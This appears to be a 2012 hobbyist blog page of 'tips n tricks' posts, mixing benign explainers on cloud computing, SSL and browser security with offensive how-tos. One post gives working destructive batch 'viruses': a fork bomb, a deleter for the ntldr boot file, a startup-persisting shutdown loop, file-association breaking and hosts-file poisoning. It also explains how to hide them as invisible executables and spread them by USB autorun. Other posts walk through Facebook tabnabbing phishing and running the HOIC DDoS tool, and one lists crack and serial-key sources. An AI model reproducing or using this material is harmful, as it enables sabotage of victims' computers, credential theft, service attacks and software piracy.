This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Tips n tricks. Show all posts
Showing posts with label Tips n tricks. Show all posts

Monday, 20 August 2012

Make Your Blog Or Wordpress Site Password Protected.

Protecting your blogger or wordpress blogs from spammers, clickers and other frauds have always been a major key point in any website designer life. If you are a blogger you will try to make your website safe from people you do not want to enter in your website or you do not want anyone to comment on your website, well I simply mean stopping unauthorized access to your website.

Well today we are going to teach you how you can easily add a password to your blogger or wordpress blog and when ever a person pumps in your websites address he will be greeted with a password prompt dialog, where he have to enter the password kept by you if he fails to enter the password then he will be redirected to your desired website.
1. Go to Blogger > Template > Edit HTML
2. Now press Ctrl + F and search for the </body> tag and add below code above it.
<script>
var password = 'Password-Here'
password=prompt('Please enter the password to enter this site:','');
if (password != 'Password-Here') {
location.href='Redirect-URL-Here'}
</script>
3. Now just press Save Template and refresh your blog to see the password asking popup.

Customizations :

You can change the password according to your wish, just change the letters in red color to your password. You can add any URL to which the visitor will be redirected if he enters the wrong password or cancel to add any password, just change the Blue line in the above code with your URL.

Thursday, 5 April 2012

Install Windows-XP in 10 minutes.



STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Formatting Procedure...

Now After Reboot The Below Image Will Appear....

                                                         

STEP 2: Now As This Image APPEARS You Have to Press "Shift + F10 " . This Will Open The command Prompt... Now type taskmgr in it. This will open the Task manager .

STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe" process and Right CLICK on It.... and set the Priority to Highest....
                                           

STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....

Thats the Overall Tutorial...Hope You all Have LIKED IT...
So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes...

Thursday, 29 March 2012

Best Temporery Email Services @ Internet.


People use temporary email services when they are unwilling to reveal their actual email address mainly because they fear spam ( which is a good thing ). Dear friends temporary mails are used as below reasons:



  • It is used for those site which enter the person with email subscription
  • It used for security purpose
  • Its used for fake mails
  • Its used for temporary and not annoy you with their mails
  • Track email through a RSS feed

While there are several disposable email services like: 
  etc, a new web service called Mmmmail lets you enjoy the benefits of disposable email with an additional ability to track email through a RSS feed. Just head over to their website, put a desired nickname for your disposable email address and click on check mmmmail ! You'll presented with a link to rss feed which keeps track of all emails sent to that temporary address. Check it out here and share your views.

Friday, 23 March 2012

What Is Cloud Computing? Explained In Simple Words


I’m sure you’ve heard the following two words being used extensively online in the last couple of years. Cloud Computing. The next time you read something about a service that mentions ‘Cloud’, you will immediately know what they mean by that, and what exactly cloud computing is and how does it work.

What is Cloud Computing and how does it work, explained in simple terms?

Actually, you’ve been using cloud computing all this time, unless you were living in a cave somewhere, and that cave somehow didn’t have an internet connection.

So let me put this in as simple terms as possible:
Cloud Computing is the ability to use the power of other computers (located somewhere else) and their software, via the Internet (or sometimes other networks), without the need to own them. They are being provided to you, as a service.

That means you don’t have to go and buy some super powerful gigantic computer system and risk have it sitting there, doing nothing. By utilizing the cloud, everything is ready for you whenever you might need it. Exactly where the hardware and software is located and how it all works doesn’t matter to you, as a user. It’s just somewhere up in the vast “cloud” that the Internet represents.
Now you know one of the reasons they call it the Cloud Computing.
One good example of someone who provides these types of cloud services would be RackSpace cloud company.

To illustrate the point even better, let’s go over one typical example of cloud computing that you must have used before (exception are those with the cave thing
from above.)

                            
  Google as an example of cloud computing

What happens when you type and search something on Google?
Have you ever thought about this? Does your PC goes through all that information, sorts it out for you and display all the relevant results? No, it doesn’t. Otherwise, you would wait much longer for a simple results page to display. A simple PC can’t process all those billions of websites in a fraction of a second, like Google does. Your PC only serves as a messenger to tell Google what you are looking for. Everything else is done by some of Google’s powerful computers located somewhere, Who-Knows-Where in the world.
Now, did you ever care about how or where that comes from? Why would you, right? Exactly. That’s a great example of how cloud computing is used.

At this point, I’m sure you understand what cloud computing is and the basic idea behind it. If that’s everything you wanted to know, you can stop here, and go enjoy your life knowing what Cloud Computing is. If you are interested in just a little tiny bit more about it, continue reading to the end (not long from here).

3 Types of Cloud Computing 

1. Infrastructure as a Service (IaaS) is basically when you buy raw computing hardware to use over the net, usually servers, or online storage. You buy what you need and pay-as-you-go. The best and the most basic example of this type of cloud computing is buying a web hosting for your website. You pay monthly fee to a hosting company for the storage on their servers and to have them serve up files for your website from those servers.

2. Software as a Service (SaaS) is a case where you use the complete software application that’s running on someone else’s servers. The best example of this is Google Docs, which you can use for creating and storing text documents, presentations, spreadsheets and so on…

3. Platform as a Service (PaaS) is case where you create applications using web-based tools so they run on systems software and hardware provided by another company. As an example, consider a situation where you develop your own e-commerce website but have the whole thing, including the shopping cart, checkout, and payment mechanism running on a merchant’s server.

That should be all you need to know to get you started.

As you can see, the idea behind cloud computing is very powerful and useful beyond measure. Especially now when you actually know what it is.

Tuesday, 20 March 2012

Batch Files!The Art Of Creating Virus.

Hello Guys,Today lets discuss about how to create our own batch virus and spread itI could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.


What are Batch Files ?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one


1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
 
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
 
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file


So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.


What can batch viruses do ?


They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.


Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).


Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1. Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop


This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.


2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x


Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.


3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x


This code would start creating windows user accounts whose names could be any random numbers.


3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds


Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup




Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.


4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply


Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.





Lets make a batch file to
delete this file from victim's computer and the windows will not start then.


attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file


After running this batch file , system will not reboot and a normal victim would definitely install the windows again.





5. Fork Bomb


%0|%0 //Its percentage zero pipe percentage zero


This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .








6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything




Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.




7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.


@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.


Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.


Viruses we just coded







Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.


To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.


After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.


You can use other options as per your requirement.


Spreading batch viruses through pen drive -:


Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico


Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .


When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Tuesday, 13 March 2012

HOIC - Another DDOS tool by Anonymous

A new DDOS tool is release by Anonymous called high-orbit ion canon or HOIC. This release is only for windows and has a nice GUI. If the attackers. see the home screen of the software. 



There are two round buttons under the target label. Click on the+ sign to add a website to attack and - sign button is used to remove a website. Set the number of threads and increase it to increase the strength of the attack. 


When you click on the+ button, a new window will open where you can specify following things

  • URL - is the target website to attack
  • Power -> sets the request velocity.  
  • Booster - are config scripts that define the dynamic request attributes
HOIC includes a new feature called 'boosters' which are files you download or add to an attack machine which enables the attacker to manipulate headers such as language, referrer, host, etc.

To launch the attack click on "FIRE TEH LAZER!" button.


HOIC uses some randomization techniques to evade the detection.But there are some requests which can be used to detect. This tool is strictly an HTTP DOS attacking tool while LOIC has TCP, UDP and HTTP attack options.


As compared to LOIC, this tool seems to be more complicated. New Boosters script makes it harder to use. Becauase downloading and then configuring Boosters is not so easy. This new tool only focuses on HTTP attack.

Sunday, 11 March 2012

HACK FACEBOOK BY TABNABBING-NEW KIND OF PHISHING ATTACK

Hi friends I already posted couple of articles on Phishing.Phishing is the easiest method to hack any kind of account because it doesnt involve any experience of Programming and Hacking.All you need is a bunch of codes(To Create Phishing Pages) and a little common sense on how to trick your victim.

Today I am going to explain one of the new type of Phishing attack called Tabnabbing.
Before reading this article I would strongly recommend you to go through the below articles

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing


What is Tabnabbing?
Tabnabbing also known as ‘Tabnagging‘ and ‘Tabnapping‘ which is a new type of Phishing attack.It works similarly like Phishing but this attack is much more convincing than Phishing.When victim browses on multiple tabs, then one of the tab automatically changes into fake login page when the victim is away from that page.

How It Works?
As stated earlier this attack works when user opens multiple tabs

Initially victim navigates a normal looking page.
When victim switches to another tab, the attacker redirect their site to a phishing page.
When victim came back to attacker page, they’ll see the phishing page.(Victim assumed he open the site previously)
Victim entered their login information and this login information is sent to your server and the phishing page is login successful, so the victim don’t have any clue that their information was hacked.
How To Hack Facebook By Tabnabbing?
Requirements:
1.Basic knowledge on How Phishing works
Read below articles to know how Phishing works:

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing
2.A free web hosting account.
For this I would recommend yourfreehosting.net, 110mb.com, 000webhost.com ,drivehq.com,byehost.com
3.You should have following files which are necessary for Tabnabbing

Facebook.html -Fake Facebook login page (phisher)
login.php - Script which captures the login details of the victim
google.html - Standard google page used to trick the user
tabnabb.js - Java script which is required for tabnabbing
<<<DOWNLOAD ALL THE FILES FROM HERE>>>
Password is alltechbuzz.in


How To Do Tabnabbing~Procedure:


1.After Downloading upload facebook.html ,login.php & google.html to your webhosting excluding tabnabb.js



2.After uploading these three files then open facebook.html and copy the link of facebook.html.



3.Now open tabnabb.js with notepad and search for Enter your url here.
4.Replace it with the url of facebook.html.



5.Now upload tabnabb.js to your web hosting.
6.I hope that now you have successfully uploaded all the files to your webhosting.



7.Now you have to send google.html link to your victim.
8.To know whether your Tabnabbing is working or not just open google.html and open few tabs and wait for few seconds now your google.html will automatically change into facebook.html fake login page.
9.Now if the victim enters his details into the page then the password is yours.


How To Protect Yourself From Such Attacks?

Always keep your Browser and softwares up to date.
Use a Good Antivirus and Anti Malware.
Always check the url in the address bar while you are logging in into some social networking site.
Never enter your password on suspicious web pages.
Update:If you dont want to Tabnabb and if you want to do only Phishing then just send facebook.html page to the victim.Use 000webhost.com for hosting the files.

A new type of Phishing it can fool even the most security-conscious Web surfers.

Most Internet users know to watch for the telltale signs of a traditional phishing attack: An e-mail that asks you to click on a link and enter your e-mail or banking credentials at the resulting Web site. But a new phishing concept that exploits user inattention and trust in browser tabs is likely to fool even the most security-conscious Web surfers.
As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javacript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.
Consider the following scenario: Bob has six or seven tabs open, and one of the sites he has open (but not the tab currently being viewed) contains a script that waits for a few minutes or hours, and then quietly changes both the content of the page and the icon and descriptor in the tab itself so that it appears to be the login page for Gmail.
In this attack, the phisher need not even change the Web address displayed in the browser’s navigation toolbar. Rather, this particular phishing attack takes advantage of user trust and inattention to detail, or what Raskin calls “the perceived immutability of tabs.” Then, as the user scans their many open tabs, the favicon and title act as a strong visual cue, and the user will most likely simply think they left a Gmail tab open.
“When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in,” Raskin explained. “After the user has enter they have entered their login information and sent it back your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.”
Raskin includes a proof-of-concept at his site, which is sort of creepy when you let it run. In fact, at least once while composing this blog post in Firefox I went to click on the tab that had my Gmail inbox open, only to discover I’d accidentally clicked on Raskin’s page, which had morphed into the fake Gmail site in the interim.
It’s important to keep in mind that this attack could be used against any site, not just Gmail. Also, Raskin includes a few suggestions about how this attack could be made far sneakier — such as taking advantage of CSS history attacks.
Of course, if you are browsing with the excellent “Noscript” add-on and this is a site you have not allowed to run javascript, the proof-of-concept won’t work until you allow javascript on the page. It did not work completely against the Safari browser on my Mac (no favicon), and the test page failed completely against Google Chrome. [Update: As several readers have correctly pointed out, this attack does in fact work against Chrome, although it doesn't seem to change the favicon in Chrome tabs].
I’m left wondering what this new form of phishing will be called if it is ever adopted by the bad guys. Tabnabbing? Tabgrabbing? See if you can coin a better phrase in the comments below.
Update, May 25, 7:55 p.m. ET: Researcher Aviv Raff has posted an interesting proof-of-concept of his own that shows how this attack can work against Firefox even when users have the Noscript add-on installed and in full paranoid mode. Raff crafted his page, which is a mock up of this blog post, to morph into an image of the Gmail login page, and it will reload every 20 seconds but will only change to the sample phish page if you move to another tab with your mouse, or after 10 reloads (in case you moved with the keyboard). So it will change only after 3 minutes or so, unless you move to another tab with your mouse.
“I was trying to find a way to work around the javascript need for the [proof-of-concept],” Raff said in an instant message. “First I was able to do this without knowing if the user moved to a new tab. Now I can almost be sure of that.”
Update, May 27, 11:41 p.m. ET: For Firefox users with the Noscript plugin, there is an update to the program that can block these types of tabnabbing attacks.

How To check Suspecious website and link for virus,malewares and phishingpage.


Viruses and malwares can break into your system from a number of sources and cause serious impact on your computer system. Hence, it is extremely essential to protect your computer such threats. Most of us are aware of the fact that e-mail attachments, torrents, P2P clients, etc are some of the most common sources through which viruses and malwares infiltrate into our system. But nowadays, even websites have become as infectious as any other source.

Fortunately, there are lots of online scanners that can quickly scan websites for any malicious content. If you are a webmaster wanting to scan your website or you just want to check a website for malicious content, below are few of the best tools that can help you to do so.
1. URLVoid.com – URLVoid.com is a really handy tool to scan any website for malicious content. Just enter the URL of the website you want to scan and then hit the “Scan Now” button. Within just a few seconds, you will get a report stating whether the site is clean or not.
URLVoid Website Scan
2. AVG Online Web Page Scanner – AVG Online Web Page Scanner enables you to scan suspicious links for viruses and malware. It scans the web pages in real-time and checks if the web pages contain any hidden drive-by downloads.
AVG Online Web Pages Scan
3. Google Safe Browsing – This handy little tool from Google enables you to test any website for malicious content. It is based on the Google Safe Browsing API. To test any website all you got to do is enter the following in your address bar – http://www.google.com/safebrowsing/diagnostic?site=targetwebsite.com.
Google Safe Browsing
4. Online Link Scan – Online Link Scan is a fast, easy-to-use tool that enables you to scan any URL for viruses, malware as well as phishing. It uses the reports generated by PhisTank, AVG, Google Safe Browsing as well as SiteTruth to provide you an overall report of the target URL.
Online Link Scan
5. Norton Safe Web - Norton Safe Web is a new tool from Norton that analyzes web sites for online threats like viruses, malware, spyware and phishing. It scans the target URL and provides you detailed reports about the various threats on the site. It also creates a Norton rating based on the reports.
Norton Safe Web
6. Dr.Web Online Check – Dr.Web Online check quickly scans websites for viruses and malwares and reports if the website is clean or not. All you gotta do is enter the URL and hit the “Scan” button. It quickly scans the website and creates a report stating whether the website is clean or not.
Dr.Web Online Check

Security using Mozilla Firefox.


Today I am going to tell you how to increase your security using Mozilla Firefox, Mozilla Firefox is a very powerful browser , it can secure your Pc against any hacker ,it can maintain your privacy using Add-ons , Q1.what are Add-ons?? Add-ons are extension in your browser, which can add better functionality to your browser, Today I am going to give some tips and some information about Add-ons which are useful for you,so lets start


Try These steps out and Enhance your Security

1ST Tip: Use SSL
SSL is (Secure Socket Layer),it is an protocol which is used for secured internet communication like web browsing, email ,instant messaging, using SSL protocol gives you better security , so i recommends you to use https://encrytpted.google.com , when you search over ssl Protocol,They are encrypted So that no intermediate party can read what you are doing,except your service provider

2ND Tip: Use Add-On Of Mozilla Firefox
Mozilla Firefox is powerful browser which can secure you over Internet communication.
List of Mozilla Firefox Add-on that you can use

1. No Script

No script Add-on can be used to allow active content to run from trusted sites ,No Script provide you good security while browsing over Internet , It Secures you from unknown active contents

2. BETTER PRIVACY
its the best tool to avoid LSO(local shared object),trackers from being tracking you next question which you can put up what are LSO?
LSO are Local Shared Objects which are collections of cookies-like data stored as a file on user computer which can be used by websites to locate your computer at a later time to keep tracks Of users so use Better Privacy to delete lso created by websites

3. AD BLOCK PLUS
This add-on blocks ads from different website which are sponsored by big websites

4. SSL BLACKLIST TOOL
Ssl Blacklist provides information about Ssl certificate of particular website , It tells you the blacklisted sites

5. WOT
wot Is (Web Of Trust), it's an safeguard to browsing , it provides details about the rating of websites by users,it is run by wot community it's an powerful tool to check rating Of websites

6. PHIS TANK SITE CHECKER
This add-on secure your pc against phishing ,what is phishing? phishing is an act of collecting useful information about username, password , credit card information its an illegal activity ,so this add-on provides you security against phishing

7. TRACKER WATCHER
Tracker Watcher watches who collects information about your pc , it blocks all intermediate parties who are collecting Information about you,so use it and protect yourself against tracking

8. BUG ME NOT
it prevents bugs to enter your browser , so use it and avoid bugs

9. KEY LOGGER BEATER
it is used to keep username and password from being stolen by a key logger,what is KEY LOGGING? it is an action of tracking keys struck on a Keyboard , So If you don't want to loose your username and password from being stolen by a key logger , So use this add-on and enhance your security

10. GHOSTERY
it is one of the powerful functionality to protect your privacy from trackers and give You a detailed info about trackers and blocks them from tracking you

HOPE ALL THIS ADD-ON WILL SECURE YOU AGAINST ANY EVIL ATTACK

one more tip start using private browsing:

To start private browsing option
1...click on tools
2... Select start private browsing
in private browsing your browser does not stores any history and cookies, and use latest version Of browser to be secured

so enhance your security by using simple Add-on

Saturday, 10 March 2012

Simplest way to download Google Books!.


You must familiar with term Google Books. Its online dictionary where you can find almost every book. But there are some limitation that you can’t download them, only can just read them online. Today I will tell you 2 Best Ways To Download Google Books For Free. There are some requirement that for download them you need mozilla firefox. If you don’t have one you can download it here. Now let’s get started.
How to do this?
Method 1( Using Greasemonkey)
Step 1:
Download/install Greasemonkey addon(Customize the way a web page displays or behaves, by using small bits of JavaScript.) in Firefox
Install this userscript :google book download
Download/insall the Flashgot (FlashGot is the free add-on for Firefox and Thunderbird, meant to handle single and massive (“all” and “selection”) downloads with several external Download Managers. )
Download/install Flashget(Download Manager)
Step 2: 
View your favorite book.
For Example: http://books.google.com/books?id=Tmy8LAaVka8C&printsec=frontcover
In the left panel, click Download this book
Select all pages, right-click, choose FlashGot Selection
Press OK to start downloading. Note : Download only one page at a time, or your IP will be banned
After the downloading is finished, in FlashGet, left panel, choose Downloaded folder.
Select all pages of the book, right-click, choose Rename -> Comment As Filename
Read book
Method 2 
I am pretty sure that most of us have atleast heard of this method if we haven’t tried. Yes, I am talking about the tool, Google Books DownloaderThis tool has been there since ages and people have been loving it since then as it is so very easy to use.
In order to use this tool to download Google Books for free, you need the book code for that respective code. So visit the Google Books website, and get its code.
Now, copy that book code and paste it in the respective field provided on the GBD and then click on Check button. Once it searches and finds the book for you, all you need to do is click on Download entire book button.

GBD will download the complete book if it is available on Google Books or it would download the pages that are available in PDF format once the book is downloaded and you click on Save Book button.

Saturday, 25 February 2012

How Does Secure Sockets Layer (SSL) Works?.


Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

What exactly is Secure Communication ?

Suppose there exists two communication parties A (client) and B (server).
Working of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between Aand B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
Now lets see the working of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below

How is HTTPS implemented ?

HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.
  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.

How To Get a Serial key or Crack of Any Software!.

 
Once Again i am back with a worth article for my ICA members, This time i am going to explain you that how you can "Find Serial Key / Cracks for Any Software !".I assume that most of you use pirated software. Not everyone can afford buying a program like Photoshop, which costs $699. In this case you can use alternative, free software or you can download a pirated, cracked version of the program. There is a vast number of websites out there, where you can find serial numbers and cracks for any program, but most of them aren't safe to use. Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken  or Srizbi Botnet army. In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your pc. This is the part of Hacking/Cracking using "Google hacking".

Google Hacking : I will explain google hacking in details in next article very soon.But for now its enough to know that,Google hacking means..how you can search all desired information in direct way,using some google searching tricks.

Now in this article i am going to explain all possible ways to Find the serial Key
a.) Using Google
b.) Using Craagle Software
c.) Using serials search websites.


Finding Serial Key using Google :

To Get the serial number from googleyou have to just follow these steps :

* Go to Google.

* In the search field type : "Software name" 94FBR

* Where, "Software Name" is the name of the item you want to find the serial number for.

* And in google search Results you will get the list of all those websites where the serial key of the required software is available.Thats it !!  :-)

HOW DOES THIS WORK ?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches :
Search the following Keywords on Google :-

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

How to get Serial key using Craagle Software ?
Craagle is a free search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into shit, like annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with.
It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.You can also use a proxy to bypass Day Limit for some sites.



* Crack Sites Supported :

Cracks.Am, KeyGen.Us, AllCracks.Net, Andr.Net, Crack.Ms,Crackz.Ws, CrackArchive.Com, CrackDb.Com, CrackzPlanet.Com,CrackWay.Com, MsCracks.Com, CrackPortal.Com, TheCracks.Us,KeyGen.Ru

* Serial Sites Supported :

Seriall.Com, FreeSerials.Com, SerialSite.Com, Serials.Ws, Andr.Net, SerialKey.Net, SerialArchive.Com, CrackzPlanet.Com,MsCracks.Com, CrackPortal.Com, KeyGen.Name, TheKeys.Ws,FreeSerials.Ws, FreeSerials.Spb.Ru, Serial.220volt.Info,SerialCodes.Net

* Cover Site Supported :

CoverTarget.Com, CoverAll.Come.To, CoverIsland.Com

Download Craagle 4.0 -  Click Here

Get Serial keys from Serials Search Engines

Here i also want to present you a list of "clean" crack/Serial Search sites for all the latest warez to unlock your software.Please note that the site reviews herein only include information about each site, not the contents of the 'cracks' themselves. Always use a reputable antivirus and antispyware program on cracks & keygens before using them. The same goes for Craagle

    * www.serials.ws
    * www.keygen.in
    * www.smartserials.com
    * www.keygenguru.com - Popular site with hundreds of thousands of results.
    * www.serialkey.net
    * www.zcrack.com
    * www.subserials.net
    * www.serialportal.com
    * supercracks.net
    * www.serialcrackz.com
    * www.serials.be
    * www.cracktop.com
    * www.cracksfm.com
    * www.cracklib.net
    * www.crackdb.org
    * www.theserials.com

Friday, 24 February 2012

What is BOT?.




BOT is a malicious program with the purpose of fraudulent use of computer. Once your computer is infected with BOT, the malicious attacker (referred to "attacker" hereinafter) remotely controls your computer from the external.
This attack causes serious harm of making public nuisance such as "sending numerous number of mails" and "attacking a particular website", as well as of stealing information stored in your computer, i.e., "spying activities.
As this external control of your computer is analogous to a robot, it is referred to BOT.

Threat of BOT network When your computer is infected by BOT-type virus, it may be used for crime, making you a perpetrator.

A computer that is infected with BOT is automatically connected to instruction server or something similar installed by the attacker, resulting in formation of gigantic computer network referred to "BOT network", which is configured by several tens to several millions of BOT-infected computers.
Once infected computers receive instructions from the instruction server controlled by the attacker, they are controlled on the attackers discretion and act in sending numerous number of spam mails for the purposes of phishing and the like as well as in attacking a particular website (DDoS attack).
Thus, the users of such infected computers are used as steppingstones for the attacker without their knowledge, and forced to be not only "victims" but also "perpetrators."

Send-out of nuisance mails Conduct of sending nuisance mails via your computerWebsite attack Attack of a particular website, etc. for purposes of its unavailability, etc. (DDoS* attack)BOT infection activities Conduct of augmenting infection to other computersLeak of personal information Conduct of stealing various pieces of personal information entered and stored in your computer, using your credit card No., etc.
* DDoS (Distributed Denial of Service)

Characteristics of BOTs

Difficult to notice the infection BOTs generally do not show specific visible symptoms even when your computer is infected, being unlike the conventional viruses or worms. A user therefore does not realize the infection of his/her computer and continue to use it without noticing any difference of the computer from before the infection.

Automatically add functions BOT can update itself by adding new functions or correcting defects using the function of automatic self-updating. The updating interval is said to be short, e.g., several weeks. This also makes BOT difficult to be found.

Various types of BOTs Since source codes or tools for easy preparation of BOTs are disclosed on the Internet, many subspecies of a BOT have been prepared based on the single BOT. This feature has made BOT cleaning by using Anti-Virus software be difficult.

For crime With conventional viruses, offenders committed the crime for their pleasure. In contrast, the preparers of BOTs aim to gain benefit from BOTs through, for example, lending BOTNET (networks using BOTs) to nuisance mail delivery companies on a pay-by-the-hour basis, selling personal information stolen, and so on.

BOT action after infection

1 Send-out of nuisance mails
BOTs send out nuisance mails using the infected computers as steppingstones. Although only a few mails are dispatched from a single infected computer so that the computer user does not realize the situation, BOTs can entirely dispatch numerous number of nuisance mails, using several thousand infected computers in the BOTNET.

2 Attacks such as DoS attack
